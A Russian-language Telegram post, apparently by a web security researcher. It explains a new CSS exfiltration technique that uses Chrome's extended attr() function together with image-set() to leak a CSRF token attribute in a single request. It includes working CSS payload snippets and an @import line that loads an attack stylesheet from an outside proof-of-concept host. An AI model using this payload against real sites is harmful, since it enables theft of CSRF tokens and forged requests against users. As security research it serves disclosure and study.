TGViewer
Заметки Слонсера Заметки Слонсера @slonser_notes · 3.03K subscribers
Post #895 5.48K
Вчера как обычно сделал обычный пост в соц сети Илона Маска, который довольно сильно разошелся. Поэтому для тех кто читает только мой тг повторю тут.

Думаю многие знакомы с CSS exfiltration, а если нет можете прочитать статью 2 летней давности на portswigger
Основная идея тогда заключалась в том, чтобы с помощью CSS селекторов брутфорсить атрибуты тегов:
input[value^="a"] {
--starts-with-a:url(/startsWithA);
}

Например так можно украсть CSRF токен, однако атака довольно нестабильная, медленная и тд. Довольно плохо реализуема.

Однако я обнаружил, что начиная с Chrome 133 произошло важное изменение в функции CSS attr, раньше она могла использоваться только с content property, теперь же вы можете использовать её вместе с переменными CSS (https://developer.chrome.com/blog/advanced-attr):
form {
--val: attr(csrf-token);
}

--val будет содержать содержать значение атрибута csrf-token
Однако мы не можем использовать такое внутри url:
form {
--val: attr(csrf-token);
background: url(var(--val)); /* Correct */
}

Браузер просто проигнорирует такой property как неверный
Однако на помощь опять спешат новые стандарты CSS, чтобы добиться успеха достаточно использовать image-set
form {
--val: attr(csrf-token);
background: image-set(var(--val)); /* Correct */
}


После чего просто сохраняете стиль с кражей нужного поля (например атрибута value у тега input с именем csrf-token)
И делаете @import с атакуемой страницы :
 @import url(https://pocs.neplox.security/css-2025-exfiltration.css);

После чего, как можно увидеть на скриншоте, через один запрос вы получите полное значение атрибута тега
  • 🔥 51
  • 👍 8
  • 👏 8
  • 🤯 5
More from @slonser_notes
  1. Aug 9, 2026https://portswigger.net/research/css-the-bomb-inside-your-inbox Очень классный ресерч от G…
  2. Jul 4, 2026Наконец-то гугл запатчили багу которую мы сдавали ещё в ноябре прошлого года Наверное сама…
  3. May 26, 2026Во время конфаба записали подкастик Наверное откровений там не найдете, но послушать пока…
  4. Mar 19, 2026Хороший пост про ИИ от Петра Уварова (известный вам по ББ ВК, да он завел канал в MAX Tele…
  5. Mar 4, 2026Приходите послушать меня -_+
  6. Mar 4, 2026VK Security Confab для: Bug Bounty edition — уже 19 марта 🔥 Соберёмся офлайн, чтобы обсуд…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →